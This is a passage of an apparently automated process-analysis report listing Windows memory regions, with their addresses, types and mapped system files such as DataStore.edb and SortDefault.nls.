= "pagefile_0x000000c61d4a0000" filename = "" Region: id = 2380 start_va = 0xc61d4b0000 end_va = 0xc61d4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d4b0000" filename = "" Region: id = 2381 start_va = 0xc61d4c0000 end_va = 0xc61d4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d4c0000" filename = "" Region: id = 2382 start_va = 0xc61d4d0000 end_va = 0xc61d5cffff entry_point = 0x0 region_type = private name = "private_0x000000c61d4d0000" filename = "" Region: id = 2383 start_va = 0xc61d5d0000 end_va = 0xc61d757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d5d0000" filename = "" Region: id = 2384 start_va = 0xc61d760000 end_va = 0xc61d762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d760000" filename = "" Region: id = 2385 start_va = 0xc61d770000 end_va = 0xc61d776fff entry_point = 0x0 region_type = private name = "private_0x000000c61d770000" filename = "" Region: id = 2386 start_va = 0xc61d780000 end_va = 0xc61d78ffff entry_point = 0x0 region_type = private name = "private_0x000000c61d780000" filename = "" Region: id = 2387 start_va = 0xc61d790000 end_va = 0xc61d910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d790000" filename = "" Region: id = 2388 start_va = 0xc61d920000 end_va = 0xc61d9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d920000" filename = "" Region: id = 2389 start_va = 0xc61d9e0000 end_va = 0xc61dddbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d9e0000" filename = "" Region: id = 2390 start_va = 0xc61dde0000 end_va = 0xc61de5ffff entry_point = 0x0 region_type = private name = "private_0x000000c61dde0000" filename = "" Region: id = 2391 start_va = 0xc61de60000 end_va = 0xc61de63fff entry_point = 0xc61de60000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2392 start_va = 0xc61de70000 end_va = 0xc61deaefff entry_point = 0xc61de70000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000006.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db") Region: id = 2393 start_va = 0xc61deb0000 end_va = 0xc61deb3fff entry_point = 0xc61deb0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2394 start_va = 0xc61dec0000 end_va = 0xc61dec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61dec0000" filename = "" Region: id = 2395 start_va = 0xc61ded0000 end_va = 0xc61ded0fff entry_point = 0x0 region_type = private name = "private_0x000000c61ded0000" filename = "" Region: id = 2396 start_va = 0xc61dee0000 end_va = 0xc61e1b4fff entry_point = 0xc61dee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2397 start_va = 0xc61e1c0000 end_va = 0xc61e23ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e1c0000" filename = "" Region: id = 2398 start_va = 0xc61e240000 end_va = 0xc61e2bffff entry_point = 0x0 region_type = private name = "private_0x000000c61e240000" filename = "" Region: id = 2399 start_va = 0xc61e2c0000 end_va = 0xc61e33ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e2c0000" filename = "" Region: id = 2400 start_va = 0xc61e340000 end_va = 0xc61e3bffff entry_point = 0x0 region_type = private name = "private_0x000000c61e340000" filename = "" Region: id = 2401 start_va = 0xc61e3c0000 end_va = 0xc61e3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61e3c0000" filename = "" Region: id = 2402 start_va = 0xc61e3d0000 end_va = 0xc61e3dffff entry_point = 0x0 region_type = private name = "private_0x000000c61e3d0000" filename = "" Region: id = 2403 start_va = 0xc61e3e0000 end_va = 0xc61e45ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e3e0000" filename = "" Region: id = 2404 start_va = 0xc61e460000 end_va = 0xc61e4dffff entry_point = 0x0 region_type = private name = "private_0x000000c61e460000" filename = "" Region: id = 2405 start_va = 0xc61e4e0000 end_va = 0xc61e55ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e4e0000" filename = "" Region: id = 2406 start_va = 0xc61e560000 end_va = 0xc61e5dffff entry_point = 0x0 region_type = private name = "private_0x000000c61e560000" filename = "" Region: id = 2407 start_va = 0xc61e5e0000 end_va = 0xc61e6dffff entry_point = 0x0 region_type = private name = "private_0x000000c61e5e0000" filename = "" Region: id = 2408 start_va = 0xc61e6e0000 end_va = 0xc61e75ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e6e0000" filename = "" Region: id = 2409 start_va = 0xc61e760000 end_va = 0xc61e7dffff entry_point = 0x0 region_type = private name = "private_0x000000c61e760000" filename = "" Region: id = 2410 start_va = 0xc61e7e0000 end_va = 0xc61e85ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e7e0000" filename = "" Region: id = 2411 start_va = 0xc61e860000 end_va = 0xc61e8dffff entry_point = 0x0 region_type = private name = "private_0x000000c61e860000" filename = "" Region: id = 2412 start_va = 0xc61e8e0000 end_va = 0xc61e95ffff entry_point = 0x0 region_type = private name = "private_0x000000c61e8e0000" filename = "" Region: id = 2413 start_va = 0xc61e960000 end_va = 0xc61e9e2fff entry_point = 0xc61e960000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2414 start_va = 0xc61e9f0000 end_va = 0xc61e9f0fff entry_point = 0xc61e9f0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 2415 start_va = 0xc61ea00000 end_va = 0xc61ea00fff entry_point = 0x0 region_type = private name = "private_0x000000c61ea00000" filename = "" Region: id = 2416 start_va = 0xc61ea10000 end_va = 0xc61ea16fff entry_point = 0x0 region_type = private name = "private_0x000000c61ea10000" filename = "" Region: id = 2417 start_va = 0xc61ea20000 end_va = 0xc61ea26fff entry_point = 0x0 region_type = private name = "private_0x000000c61ea20000" filename = "" Region: id = 2418 start_va = 0xc61ea30000 end_va = 0xc61ea30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ea30000" filename = "" Region: id = 2419 start_va = 0xc61ea40000 end_va = 0xc61ea4ffff entry_point = 0x0 region_type = private name = "private_0x000000c61ea40000" filename = "" Region: id = 2420 start_va = 0xc61ea50000 end_va = 0xc61eacffff entry_point = 0x0 region_type = private name = "private_0x000000c61ea50000" filename = "" Region: id = 2421 start_va = 0xc61ead0000 end_va = 0xc61eb4ffff entry_point = 0x0 region_type = private name = "private_0x000000c61ead0000" filename = "" Region: id = 2422 start_va = 0xc61eb50000 end_va = 0xc61ebcffff entry_point = 0x0 region_type = private name = "private_0x000000c61eb50000" filename = "" Region: id = 2423 start_va = 0xc61ec50000 end_va = 0xc61eccffff entry_point = 0x0 region_type = private name = "private_0x000000c61ec50000" filename = "" Region: id = 2424 start_va = 0xc61ecd0000 end_va = 0xc61ed4ffff entry_point = 0x0 region_type = private name = "private_0x000000c61ecd0000" filename = "" Region: id = 2425 start_va = 0xc61ed50000 end_va = 0xc61ee4ffff entry_point = 0x0 region_type = private name = "private_0x000000c61ed50000" filename = "" Region: id = 2426 start_va = 0xc61ee50000 end_va = 0xc61eecffff entry_point = 0x0 region_type = private name = "private_0x000000c61ee50000" filename = "" Region: id = 2427 start_va = 0xc61eed0000 end_va = 0xc61ef4ffff entry_point = 0x0 region_type = private name = "private_0x000000c61eed0000" filename = "" Region: id = 2428 start_va = 0xc61ef50000 end_va = 0xc61efcffff entry_point = 0x0 region_type = private name = "private_0x000000c61ef50000" filename = "" Region: id = 2429 start_va = 0xc61efd0000 end_va = 0xc61f0cffff entry_point = 0x0 region_type = private name = "private_0x000000c61efd0000" filename = "" Region: id = 2430 start_va = 0xc61f0d0000 end_va = 0xc61f14ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f0d0000" filename = "" Region: id = 2431 start_va = 0xc61f150000 end_va = 0xc61f1cffff entry_point = 0x0 region_type = private name = "private_0x000000c61f150000" filename = "" Region: id = 2432 start_va = 0xc61f1d0000 end_va = 0xc61f24ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f1d0000" filename = "" Region: id = 2433 start_va = 0xc61f250000 end_va = 0xc61f2cffff entry_point = 0x0 region_type = private name = "private_0x000000c61f250000" filename = "" Region: id = 2434 start_va = 0xc61f2d0000 end_va = 0xc61f34ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f2d0000" filename = "" Region: id = 2435 start_va = 0xc61f350000 end_va = 0xc61f38efff entry_point = 0x0 region_type = private name = "private_0x000000c61f350000" filename = "" Region: id = 2436 start_va = 0xc61f390000 end_va = 0xc61f390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61f390000" filename = "" Region: id = 2437 start_va = 0xc61f3a0000 end_va = 0xc61f3a7fff entry_point = 0x0 region_type = private name = "private_0x000000c61f3a0000" filename = "" Region: id = 2438 start_va = 0xc61f3b0000 end_va = 0xc61f3bffff entry_point = 0x0 region_type = private name = "private_0x000000c61f3b0000" filename = "" Region: id = 2439 start_va = 0xc61f3c0000 end_va = 0xc61f3cffff entry_point = 0x0 region_type = private name = "private_0x000000c61f3c0000" filename = "" Region: id = 2440 start_va = 0xc61f3d0000 end_va = 0xc61f44ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f3d0000" filename = "" Region: id = 2441 start_va = 0xc61f450000 end_va = 0xc61f4cffff entry_point = 0x0 region_type = private name = "private_0x000000c61f450000" filename = "" Region: id = 2442 start_va = 0xc61f4d0000 end_va = 0xc61f5cffff entry_point = 0x0 region_type = private name = "private_0x000000c61f4d0000" filename = "" Region: id = 2443 start_va = 0xc61f5d0000 end_va = 0xc61f64ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f5d0000" filename = "" Region: id = 2444 start_va = 0xc61f650000 end_va = 0xc61f650fff entry_point = 0x0 region_type = private name = "private_0x000000c61f650000" filename = "" Region: id = 2445 start_va = 0xc61f660000 end_va = 0xc61f66ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f660000" filename = "" Region: id = 2446 start_va = 0xc61f670000 end_va = 0xc61f6effff entry_point = 0x0 region_type = private name = "private_0x000000c61f670000" filename = "" Region: id = 2447 start_va = 0xc61f6f0000 end_va = 0xc61f6f0fff entry_point = 0x0 region_type = private name = "private_0x000000c61f6f0000" filename = "" Region: id = 2448 start_va = 0xc61f700000 end_va = 0xc61f703fff entry_point = 0x0 region_type = private name = "private_0x000000c61f700000" filename = "" Region: id = 2449 start_va = 0xc61f710000 end_va = 0xc61f711fff entry_point = 0x0 region_type = private name = "private_0x000000c61f710000" filename = "" Region: id = 2450 start_va = 0xc61f720000 end_va = 0xc61f720fff entry_point = 0x0 region_type = private name = "private_0x000000c61f720000" filename = "" Region: id = 2451 start_va = 0xc61f730000 end_va = 0xc61f73ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f730000" filename = "" Region: id = 2452 start_va = 0xc61f740000 end_va = 0xc61f78bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61f740000" filename = "" Region: id = 2453 start_va = 0xc61f790000 end_va = 0xc61f98ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f790000" filename = "" Region: id = 2454 start_va = 0xc61f990000 end_va = 0xc61fa0ffff entry_point = 0x0 region_type = private name = "private_0x000000c61f990000" filename = "" Region: id = 2455 start_va = 0xc61fa10000 end_va = 0xc61fa1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61fa10000" filename = "" Region: id = 2456 start_va = 0xc61fa20000 end_va = 0xc61fa2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61fa20000" filename = "" Region: id = 2457 start_va = 0xc61fa30000 end_va = 0xc61fa3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61fa30000" filename = "" Region: id = 2458 start_va = 0xc61fa40000 end_va = 0xc61fa4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61fa40000" filename = "" Region: id = 2459 start_va = 0xc61fa50000 end_va = 0xc61fa5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61fa50000" filename = "" Region: id = 2460 start_va = 0xc61fa60000 end_va = 0xc61fa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61fa60000" filename = "" Region: id = 2461 start_va = 0xc61fa70000 end_va = 0xc61fa7ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fa70000" filename = "" Region: id = 2462 start_va = 0xc61fa80000 end_va = 0xc61fa87fff entry_point = 0x0 region_type = private name = "private_0x000000c61fa80000" filename = "" Region: id = 2463 start_va = 0xc61fb10000 end_va = 0xc61fb8ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fb10000" filename = "" Region: id = 2464 start_va = 0xc61fb90000 end_va = 0xc61fc0ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fb90000" filename = "" Region: id = 2465 start_va = 0xc61fc10000 end_va = 0xc61fc8ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fc10000" filename = "" Region: id = 2466 start_va = 0xc61fc90000 end_va = 0xc61fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fc90000" filename = "" Region: id = 2467 start_va = 0xc61fd10000 end_va = 0xc61fd8ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fd10000" filename = "" Region: id = 2468 start_va = 0xc61fd90000 end_va = 0xc61fe0ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fd90000" filename = "" Region: id = 2469 start_va = 0xc61fe10000 end_va = 0xc61fe5bfff entry_point = 0x0 region_type = private name = "private_0x000000c61fe10000" filename = "" Region: id = 2470 start_va = 0xc61fe60000 end_va = 0xc61fe8ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fe60000" filename = "" Region: id = 2471 start_va = 0xc61fe90000 end_va = 0xc61ff0ffff entry_point = 0x0 region_type = private name = "private_0x000000c61fe90000" filename = "" Region: id = 2472 start_va = 0xc61ff10000 end_va = 0xc61ff8ffff entry_point = 0x0 region_type = private name = "private_0x000000c61ff10000" filename = "" Region: id = 2473 start_va = 0xc61ff90000 end_va = 0xc61ff9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ff90000" filename = "" Region: id = 2474 start_va = 0xc61ffa0000 end_va = 0xc61ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ffa0000" filename = "" Region: id = 2475 start_va = 0xc61ffb0000 end_va = 0xc61ffbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ffb0000" filename = "" Region: id = 2476 start_va = 0xc61ffc0000 end_va = 0xc61ffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ffc0000" filename = "" Region: id = 2477 start_va = 0xc61ffd0000 end_va = 0xc61ffdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ffd0000" filename = "" Region: id = 2478 start_va = 0xc61ffe0000 end_va = 0xc61ffeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61ffe0000" filename = "" Region: id = 2479 start_va = 0xc61fff0000 end_va = 0xc61fffffff entry_point = 0xc61fff0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2480 start_va = 0xc620000000 end_va = 0xc62000ffff entry_point = 0x0 region_type = private name = "private_0x000000c620000000" filename = "" Region: id = 2481 start_va = 0xc620010000 end_va = 0xc62001ffff entry_point = 0x0 region_type = private name = "private_0x000000c620010000" filename = "" Region: id = 2482 start_va = 0xc620020000 end_va = 0xc62002ffff entry_point = 0x0 region_type = private name = "private_0x000000c620020000" filename = "" Region: id = 2483 start_va = 0xc620030000 end_va = 0xc62003ffff entry_point = 0x0 region_type = private name = "private_0x000000c620030000" filename = "" Region: id = 2484 start_va = 0xc620040000 end_va = 0xc62004ffff entry_point = 0x0 region_type = private name = "private_0x000000c620040000" filename = "" Region: id = 2485 start_va = 0xc620050000 end_va = 0xc6200cffff entry_point = 0x0 region_type = private name = "private_0x000000c620050000" filename = "" Region: id = 2486 start_va = 0xc6200d0000 end_va = 0xc62014ffff entry_point = 0x0 region_type = private name = "private_0x000000c6200d0000" filename = "" Region: id = 2487 start_va = 0xc620150000 end_va = 0xc6201cffff entry_point = 0x0 region_type = private name = "private_0x000000c620150000" filename = "" Region: id = 2488 start_va = 0xc6201d0000 end_va = 0xc62024ffff entry_point = 0x0 region_type = private name = "private_0x000000c6201d0000" filename = "" Region: id = 2489 start_va = 0xc620250000 end_va = 0xc6202cffff entry_point = 0x0 region_type = private name = "private_0x000000c620250000" filename = "" Region: id = 2490 start_va = 0xc6202d0000 end_va = 0xc62034ffff entry_point = 0x0 region_type = private name = "private_0x000000c6202d0000" filename = "" Region: id = 2491 start_va = 0xc620350000 end_va = 0xc6203cffff entry_point = 0x0 region_type = private name = "private_0x000000c620350000" filename = "" Region: id = 2492 start_va = 0xc6203d0000 end_va = 0xc62044ffff entry_point = 0x0 region_type = private name = "private_0x000000c6203d0000" filename = "" Region: id = 2493 start_va = 0xc620450000 end_va = 0xc6204cffff entry_point = 0x0 region_type = private name = "private_0x000000c620450000" filename = "" Region: id = 2494 start_va = 0xc6204d0000 end_va = 0xc6205cffff entry_point = 0x0 region_type = private name = "private_0x000000c6204d0000" filename = "" Region: id = 2495 start_va = 0xc6205d0000 end_va = 0xc62064ffff entry_point = 0x0 region_type = private name = "private_0x000000c6205d0000" filename = "" Region: id = 2496 start_va = 0xc620650000 end_va = 0xc62065ffff entry_point = 0x0 region_type = private name = "private_0x000000c620650000" filename = "" Region: id = 2497 start_va = 0xc620660000 end_va = 0xc620660fff entry_point = 0xc620660000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 2498 start_va = 0xc620670000 end_va = 0xc62067ffff entry_point = 0xc620670000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2499 start_va = 0xc620680000 end_va = 0xc620687fff entry_point = 0x0 region_type = private name = "private_0x000000c620680000" filename = "" Region: id = 2500 start_va = 0xc620690000 end_va = 0xc62069ffff entry_point = 0xc620690000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2501 start_va = 0xc6206a0000 end_va = 0xc6206affff entry_point = 0xc6206a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2502 start_va = 0xc6206b0000 end_va = 0xc6206bffff entry_point = 0xc6206b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2503 start_va = 0xc6206c0000 end_va = 0xc6206cffff entry_point = 0x0 region_type = private name = "private_0x000000c6206c0000" filename = "" Region: id = 2504 start_va = 0xc6206d0000 end_va = 0xc6207cffff entry_point = 0x0 region_type = private name = "private_0x000000c6206d0000" filename = "" Region: id = 2505 start_va = 0xc620850000 end_va = 0xc6208cffff entry_point = 0x0 region_type = private name = "private_0x000000c620850000" filename = "" Region: id = 2506 start_va = 0xc620ad0000 end_va = 0xc620bcffff entry_point = 0x0 region_type = private name = "private_0x000000c620ad0000" filename = "" Region: id = 2507 start_va = 0xc620bd0000 end_va = 0xc620fcffff entry_point = 0x0 region_type = private name = "private_0x000000c620bd0000" filename = "" Region: id = 2508 start_va = 0xc621050000 end_va = 0xc62114ffff entry_point = 0x0 region_type = private name = "private_0x000000c621050000" filename = "" Region: id = 2509 start_va = 0xc621150000 end_va = 0xc6211cffff entry_point = 0x0 region_type = private name = "private_0x000000c621150000" filename = "" Region: id = 2510 start_va = 0xc6211d0000 end_va = 0xc62124ffff entry_point = 0x0 region_type = private name = "private_0x000000c6211d0000" filename = "" Region: id = 2511 start_va = 0xc6212d0000 end_va = 0xc6213cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6212d0000" filename = "" Region: id = 2512 start_va = 0xc6213d0000 end_va = 0xc62144ffff entry_point = 0x0 region_type = private name = "private_0x000000c6213d0000" filename = "" Region: id = 2513 start_va = 0xc621450000 end_va = 0xc62145ffff entry_point = 0x0 region_type = private name = "private_0x000000c621450000" filename = "" Region: id = 2514 start_va = 0xc621460000 end_va = 0xc62146ffff entry_point = 0xc621460000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2515 start_va = 0xc621470000 end_va = 0xc62147ffff entry_point = 0xc621470000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2516 start_va = 0xc621480000 end_va = 0xc62148ffff entry_point = 0xc621480000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2517 start_va = 0xc621490000 end_va = 0xc62149ffff entry_point = 0xc621490000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2518 start_va = 0xc6214a0000 end_va = 0xc6214affff entry_point = 0x0 region_type = private name = "private_0x000000c6214a0000" filename = "" Region: id = 2519 start_va = 0xc6214b0000 end_va = 0xc6215affff entry_point = 0x0 region_type = private name = "private_0x000000c6214b0000" filename = "" Region: id = 2520 start_va = 0xc6215b0000 end_va = 0xc6216affff entry_point = 0x0 region_type = private name = "private_0x000000c6215b0000" filename = "" Region: id = 2521 start_va = 0xc6216b0000 end_va = 0xc6217affff entry_point = 0x0 region_type = private name = "private_0x000000c6216b0000" filename = "" Region: id = 2522 start_va = 0xc6217b0000 end_va = 0xc6217b6fff entry_point = 0x0 region_type = private name = "private_0x000000c6217b0000" filename = "" Region: id = 2523 start_va = 0xc6217c0000 end_va = 0xc6217cffff entry_point = 0xc6217c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2524 start_va = 0xc6217d0000 end_va = 0xc6217dffff entry_point = 0xc6217d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2525 start_va = 0xc6217e0000 end_va = 0xc6217effff entry_point = 0xc6217e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2526 start_va = 0xc6217f0000 end_va = 0xc621931fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6217f0000" filename = "" Region: id = 2527 start_va = 0xc621940000 end_va = 0xc62293ffff entry_point = 0x0 region_type = private name = "private_0x000000c621940000" filename = "" Region: id = 2528 start_va = 0xc622940000 end_va = 0xc62693ffff entry_point = 0x0 region_type = private name = "private_0x000000c622940000" filename = "" Region: id = 2529 start_va = 0xc626940000 end_va = 0xc62a93ffff entry_point = 0x0 region_type = private name = "private_0x000000c626940000" filename = "" Region: id = 2530 start_va = 0xc62a940000 end_va = 0xc62aa3ffff entry_point = 0x0 region_type = private name = "private_0x000000c62a940000" filename = "" Region: id = 2531 start_va = 0xc62aa40000 end_va = 0xc62aabffff entry_point = 0x0 region_type = private name = "private_0x000000c62aa40000" filename = "" Region: id = 2532 start_va = 0xc62aac0000 end_va = 0xc62aacffff entry_point = 0x0 region_type = private name = "private_0x000000c62aac0000" filename = "" Region: id = 2533 start_va = 0xc62aad0000 end_va = 0xc62ab4ffff entry_point = 0x0 region_type = private name = "private_0x000000c62aad0000" filename = "" Region: id = 2534 start_va = 0xc62ab50000 end_va = 0xc62ab5ffff entry_point = 0xc62ab50000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2535 start_va = 0xc62ab60000 end_va = 0xc62ab6ffff entry_point = 0x0 region_type = private name = "private_0x000000c62ab60000" filename = "" Region: id = 2536 start_va = 0xc62ab70000 end_va = 0xc62ab7ffff entry_point = 0xc62ab70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2537 start_va = 0xc62ab80000 end_va = 0xc62abfffff entry_point = 0x0 region_type = private name = "private_0x000000c62ab80000" filename = "" Region: id = 2538 start_va = 0xc62ac00000 end_va = 0xc62ac0ffff entry_point = 0xc62ac00000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2539 start_va = 0xc62ac10000 end_va = 0xc62ac1ffff entry_point = 0xc62ac10000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2540 start_va = 0xc62ac20000 end_va = 0xc62ac2ffff entry_point = 0xc62ac20000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2541 start_va = 0xc62ac30000 end_va = 0xc62ac3ffff entry_point = 0xc62ac30000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2542 start_va = 0xc62ac40000 end_va = 0xc62ac4ffff entry_point = 0xc62ac40000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2543 start_va = 0xc62ac50000 end_va = 0xc62ac5ffff entry_point = 0xc62ac50000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2544 start_va = 0xc62ac60000 end_va = 0xc62ac6ffff entry_point = 0xc62ac60000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2545 start_va = 0xc62ac70000 end_va = 0xc62ac7ffff entry_point = 0xc62ac70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2546 start_va = 0xc62ac80000 end_va = 0xc62ac8ffff entry_point = 0xc62ac80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2547 start_va = 0xc62ac90000 end_va = 0xc62ac9ffff entry_point = 0xc62ac90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2548 start_va = 0xc62aca0000 end_va = 0xc62acaffff entry_point = 0xc62aca0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2549 start_va = 0xc62acb0000 end_va = 0xc62acbffff entry_point = 0xc62acb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: 